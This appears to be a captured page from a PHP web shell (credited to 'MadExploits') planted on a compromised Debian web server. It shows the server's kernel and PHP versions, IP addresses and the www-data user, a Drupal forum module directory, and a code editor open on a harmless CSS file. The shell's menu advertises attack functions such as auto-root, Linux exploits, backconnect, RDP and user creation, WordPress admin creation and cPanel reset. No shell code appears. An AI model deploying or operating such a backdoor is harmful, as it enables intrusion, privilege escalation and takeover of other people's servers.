Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.12.34.96
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
forum /
[ HOME SHELL ]
Name
Size
Permission
Action
forum-icon.tpl.php
691
B
-rw-r--r--
forum-list.tpl.php
3.26
KB
-rw-r--r--
forum-rtl.css
398
B
-rw-r--r--
forum-submitted.tpl.php
711
B
-rw-r--r--
forum-topic-list.tpl.php
2.44
KB
-rw-r--r--
forum.admin.inc
11.72
KB
-rw-r--r--
forum.css
1.03
KB
-rw-r--r--
forum.info
364
B
-rw-r--r--
forum.install
13.27
KB
-rw-r--r--
forum.module
47.75
KB
-rw-r--r--
forum.pages.inc
1.01
KB
-rw-r--r--
forum.test
24.98
KB
-rw-r--r--
forums.tpl.php
550
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : forum.css
/** * @file * Styling for the Forum module. */ #forum .description { font-size: 0.9em; margin: 0.5em; } #forum td.created, #forum td.posts, #forum td.topics, #forum td.last-reply, #forum td.replies, #forum td.pager { white-space: nowrap; } #forum td.forum .icon { background-image: url(../../misc/forum-icons.png); background-repeat: no-repeat; float: left; /* LTR */ height: 24px; margin: 0 9px 0 0; /* LTR */ width: 24px; } #forum td.forum .forum-status-new { background-position: -24px 0; } #forum div.indent { margin-left: 20px; /* LTR */ } #forum .icon div { background-image: url(../../misc/forum-icons.png); background-repeat: no-repeat; width: 24px; height: 24px; } #forum .icon .topic-status-new { background-position: -24px 0; } #forum .icon .topic-status-hot { background-position: -48px 0; } #forum .icon .topic-status-hot-new { background-position: -72px 0; } #forum .icon .topic-status-sticky { background-position: -96px 0; } #forum .icon .topic-status-closed { background-position: -120px 0; }
Close